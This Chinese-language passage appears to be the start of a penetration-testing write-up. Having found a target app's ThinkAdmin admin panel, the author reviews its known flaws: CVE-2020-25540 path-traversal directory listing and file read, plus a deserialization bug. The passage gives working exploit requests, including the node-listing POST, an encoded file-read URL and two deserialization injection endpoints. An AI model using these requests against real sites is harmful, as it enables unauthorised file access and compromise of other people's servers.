1. thinkadmin历史漏洞复习已经找到对方的app的后台地址,是thinkadmin的,因此我们需要去复习thinkadmin的历史漏洞。CVE-2020-25540https://github.com/zoujingli/ThinkAdmin/issues/244利用POC如下https://github.com/Schira4396/CVE-2020-25540列目录POST /?s=admin/api.Update/noderules=["runtime/"]文件读取/?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b363932382x312t1b其本质大概想设计出来一个能让第三方去对比服务器上的系统web文件的功能,结果因为目录穿越造成任意目录读取。虽然有一定限制,但危害还是非常非常大,因此后续更新直接将这个功能下架。还有一个没有CVE的反序列化漏洞https://github.com/zoujingli/ThinkAdmin/issues/238存在两处接口,其中一处正是上面列目录功能的rules传参。POST /?s=admin/api.Update/noderules=payload另外一处则是POST /?s=wechat/api.Push/indexreceive=payload2. 第一份源码因为官
………………………………